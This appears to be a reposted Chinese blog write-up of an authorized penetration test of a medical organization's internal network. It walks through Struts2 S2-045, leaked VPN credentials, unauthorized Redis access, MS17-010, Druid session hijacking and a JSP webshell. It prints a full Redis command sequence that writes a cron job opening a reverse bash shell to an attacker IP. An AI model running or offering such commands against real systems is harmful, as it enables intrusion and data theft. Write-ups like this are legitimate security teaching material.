实战 | 记一次渗透某YL系统内网

admin 2023年1月20日17:26:23评论29 views字数 1077阅读3分35秒阅读模式

过程

这是有授权的渗透,一开始客户只给了几个公网开放的cms应用,但是测了一遍只有逻辑漏洞(一分钱挂号啥的),于是用fscan扫了一遍c段。

找到一个

实战 | 记一次渗透某YL系统内网

测试了一遍,最终使用s2-045拿到shell。

实战 | 记一次渗透某YL系统内网

使用这个工具添加ssh公钥,实现免密登陆,成功进入机器。

然后翻阅各类文件找到jdbc,遂连接:

实战 | 记一次渗透某YL系统内网

数据四千万条,通知客户后,继续日站。

在某文件内找到深信服vpn账号密码,于是链接准备日内网。

实战 | 记一次渗透某YL系统内网

内网ip为 10.*.200.21,使用fscan和goby收集资产。

客户得知进入内网后给内网渗透的目标站点。

实战 | 记一次渗透某YL系统内网

测试某一台机器,发现redis未授权

使用先知文章的例子,https://xz.aliyun.com/t/6103#toc-7 如下:

redis-cli.exe -h 192.168.18.138
config set dir /var/spool/cron
set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.15.3/5555 0>&1\n\n\n"
config set dbfilename root
save

期间遇到很多问题,sslvpn链接找不到自己的内网ip(给的是192啥的,不是10,所以遇到一台不是目标的机器,使用ms17010拿下权限,远程桌面链接准备做跳板)

上传ncat.exe 监听5555端口

实战 | 记一次渗透某YL系统内网

自己的机器使用recli链接未授权的redis服务,使用上述的反弹shell命令

等一会啊 shell就弹过来了

实战 | 记一次渗透某YL系统内网

于是继续传公钥上去 实现免密登陆,期间遇到各种翻文件,最终登陆系统,发现此系统是核酸检测的,遂退出报告客户

实战 | 记一次渗透某YL系统内网

这台机器拿下后测试其他机器,205.77存在Druid未授权访问漏洞。

实战 | 记一次渗透某YL系统内网

查看session监控,系统前台登陆后替换自己的session为最近的管理员session进入后台后有个文件管理,直接上传jsp后拿到shell。

(图缺了 搞完太高兴了 没保存)

结果fscan那里显示这台机的ssh是弱口令 root root

实战 | 记一次渗透某YL系统内网

好好笑 然后另一台机器不是弱口令,但是相同的方法拿到的shell。

收工。

实战 | 记一次渗透某YL系统内网


推荐阅读:


干货 | MSSQL注入和漏洞利用姿势总结


实战 | 记一次SSRF攻击内网的实战案例


干货 | 文件上传绕过的一次思路总结学习

实战 | 文件上传漏洞之最全代码检测绕过总结


实战 | WAF-Bypass之SQL注入绕过思路总结


2023年零基础+进阶系统化白帽黑客学习


点赞,转发,在看


原文作者:Depy

文章来源:https://rce.ink/

如有侵权,请联系删除

实战 | 记一次渗透某YL系统内网

原文始发于微信公众号(HACK学习呀):实战 | 记一次渗透某YL系统内网

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月20日17:26:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战 | 记一次渗透某YL系统内网https://cn-sec.com/archives/1522919.html

发表评论

匿名网友 填写信息